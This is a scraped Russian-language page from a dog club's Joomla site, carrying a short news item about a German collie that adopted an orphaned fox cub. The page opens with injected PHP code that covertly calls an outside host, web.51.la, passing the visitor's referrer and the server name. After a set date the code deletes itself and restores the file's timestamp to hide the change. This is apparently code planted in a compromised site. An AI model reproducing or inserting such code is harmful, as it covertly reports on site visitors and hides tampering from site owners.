check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456755828){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776972&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/views.php"); } Коллисия: колли усыновила лисёнка
 

РКФ Новый век

Мы в ответе за тех, кого приручили.

  • Увеличить размер шрифта
  • Размер шрифта по умолчанию
  • Уменьшить размер шрифта
Home Интересные новости Коллисия: колли усыновила лисёнка

Коллисия: колли усыновила лисёнка

E-mail Печать PDF
>Детёныши диких животных, чьи мамы погибают от машин на дороге, обычно не имеют шансов на выживание. Диноццо из Германии — именно такой детеныш лисы, ему три месяца и он сирота. Однако Диноццо повезло — его передали ветеринару, а затем забрали домой. У нынешних хозяев Диноццо есть колли по клике Зива, и материнские инстинкты Зивы спасли лисёнку жизнь.

У Вернера и Анхелики Шмайнг, живущих в Обершельде, есть ещё кот Леопольд и два поросёнка. Леопольд также подружился с Диноццо. Собака с кошкой сделали так, что лисёнок почувствовал, что ему рады и его любят.






Источник http://daylapu.ru/news.php?ngod=2018&news=7
 

Добавить комментарий


Защитный код
Обновить

Пользовательский поиск



Случайное изображение.

 019.jpg

Реклама